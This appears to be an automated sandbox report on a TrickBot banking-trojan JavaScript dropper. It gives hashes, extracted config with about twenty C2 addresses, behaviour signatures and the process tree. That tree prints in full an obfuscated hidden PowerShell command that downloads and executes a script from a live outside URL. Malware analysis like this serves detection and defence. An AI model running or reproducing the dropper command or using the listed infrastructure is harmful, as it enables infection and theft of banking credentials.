trickbot | 97e2a97f378f9af38427493fb965461310ee42dd8d74725223073b8fd0f77e65

General

Target

32.js
Size

463KB
MD5

8f545d23b3544ed3e79ac481de6d2e35
SHA1

2232a67e54f505fbd1d70ae0e18db1f8ed0b307d
SHA256

97e2a97f378f9af38427493fb965461310ee42dd8d74725223073b8fd0f77e65
SHA512

ef0df34055533efc390798bfe0c3875f0bfb5a975012ff77915e4f64c21e4eaf0abdbdeac4d85c74c73dbac9c6744cf4dbe905dc44d089179969516be804d1be

Score

10^/10

trickbot rob109 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://109.248.201.26/lovemetertok.php

Extracted

Family

trickbot

Version

100018

Botnet

rob109

C2

38.110.103.124:443

185.56.76.28:443

204.138.26.60:443

60.51.47.65:443

74.85.157.139:443

68.69.26.182:443

38.110.103.136:443

38.110.103.18:443

138.34.28.219:443

185.56.76.94:443

217.115.240.248:443

24.162.214.166:443

80.15.2.105:443

154.58.23.192:443

38.110.100.104:443

45.36.99.184:443

185.56.76.108:443

185.56.76.72:443

138.34.28.35:443

97.83.40.67:443

Attributes

autorun
Name:pwgrabb
Name:pwgrabc

ecc_pubkey.base64

Signatures

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

11 2328 powershell.exe
12 2328 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2336 rundll32.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

19 wtfismyip.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

2328 powershell.exe
2328 powershell.exe
2328 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewermgr.exe

description pid process

Token: SeDebugPrivilege 2328 powershell.exe
Token: SeDebugPrivilege 3568 wermgr.exe

flow	pid	process
11	2328	powershell.exe
12	2328	powershell.exe

pid	process
2336	rundll32.exe

flow	ioc
19	wtfismyip.com

pid	process
2328	powershell.exe
2328	powershell.exe
2328	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	3568	wermgr.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

wscript.execmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 664 wrote to memory of 204	664	wscript.exe	cmd.exe
PID 664 wrote to memory of 204	664	wscript.exe	cmd.exe
PID 204 wrote to memory of 2328	204	cmd.exe	powershell.exe
PID 204 wrote to memory of 2328	204	cmd.exe	powershell.exe
PID 2328 wrote to memory of 1148	2328	powershell.exe	rundll32.exe
PID 2328 wrote to memory of 1148	2328	powershell.exe	rundll32.exe
PID 1148 wrote to memory of 2336	1148	rundll32.exe	rundll32.exe
PID 1148 wrote to memory of 2336	1148	rundll32.exe	rundll32.exe
PID 1148 wrote to memory of 2336	1148	rundll32.exe	rundll32.exe
PID 2336 wrote to memory of 764	2336	rundll32.exe	cmd.exe
PID 2336 wrote to memory of 764	2336	rundll32.exe	cmd.exe
PID 2336 wrote to memory of 764	2336	rundll32.exe	cmd.exe
PID 2336 wrote to memory of 3568	2336	rundll32.exe	wermgr.exe
PID 2336 wrote to memory of 3568	2336	rundll32.exe	wermgr.exe
PID 2336 wrote to memory of 3568	2336	rundll32.exe	wermgr.exe
PID 2336 wrote to memory of 3568	2336	rundll32.exe	wermgr.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\32.js
1⤵
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
2⤵
- Suspicious use of WriteProcessMemory
PID:204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\KjVwfSl.bin,StartW
4⤵
- Suspicious use of WriteProcessMemory
PID:1148

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\KjVwfSl.bin,StartW
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe
6⤵
PID:764

C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3568

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\KjVwfSl.bin
MD5
917e3c54104affcbe521e23e85517bb0

SHA1
1bffd59bd2618f7ef810c02e9ddbc2011949e251

SHA256
d06c5ec5cefe2c6b80bf532cae9c270f2e25f0f2c5e6b05cffa36fe8a17dac3c

SHA512
40e769e1f1c9d2531485fa9ac0e55d8c7b04486f32884d636ea0f08c26f702232be8ba11d6299722a3117b7bb08344c63a3bb375f7ef74b030663ca3bd411a0e

Download Submit
\Users\Admin\AppData\Local\Temp\KjVwfSl.bin
MD5
917e3c54104affcbe521e23e85517bb0

SHA1
1bffd59bd2618f7ef810c02e9ddbc2011949e251

SHA256
d06c5ec5cefe2c6b80bf532cae9c270f2e25f0f2c5e6b05cffa36fe8a17dac3c

SHA512
40e769e1f1c9d2531485fa9ac0e55d8c7b04486f32884d636ea0f08c26f702232be8ba11d6299722a3117b7bb08344c63a3bb375f7ef74b030663ca3bd411a0e

Download Submit
memory/204-114-0x0000000000000000-mapping.dmp

Download
memory/1148-133-0x0000000000000000-mapping.dmp

Download
memory/2328-131-0x000002C0DC303000-0x000002C0DC305000-memory.dmp

Filesize
8KB

Download
memory/2328-115-0x0000000000000000-mapping.dmp

Download
memory/2328-132-0x000002C0DC306000-0x000002C0DC308000-memory.dmp

Filesize
8KB

Download
memory/2328-125-0x000002C0DC490000-0x000002C0DC491000-memory.dmp

Filesize
4KB

Download
memory/2328-120-0x000002C0C4170000-0x000002C0C4171000-memory.dmp

Filesize
4KB

Download
memory/2328-130-0x000002C0DC300000-0x000002C0DC302000-memory.dmp

Filesize
8KB

Download
memory/2336-143-0x0000000000F40000-0x0000000000F77000-memory.dmp

Filesize
220KB

Download
memory/2336-138-0x00000000004D0000-0x000000000050B000-memory.dmp

Filesize
236KB

Download
memory/2336-141-0x0000000000F00000-0x0000000000F39000-memory.dmp

Filesize
228KB

Download
memory/2336-136-0x0000000000000000-mapping.dmp

Download
memory/2336-146-0x0000000000F80000-0x0000000000FC4000-memory.dmp

Filesize
272KB

Download
memory/2336-145-0x0000000000DC0000-0x0000000000DF8000-memory.dmp

Filesize
224KB

Download
memory/2336-147-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

Filesize
4KB

Download
memory/2336-148-0x0000000000FD1000-0x0000000000FD3000-memory.dmp

Filesize
8KB

Download
memory/3568-149-0x0000000000000000-mapping.dmp

Download
memory/3568-151-0x00000195756C0000-0x00000195756C1000-memory.dmp

Filesize
4KB

Download
memory/3568-150-0x00000195755A0000-0x00000195755C8000-memory.dmp

Filesize
160KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads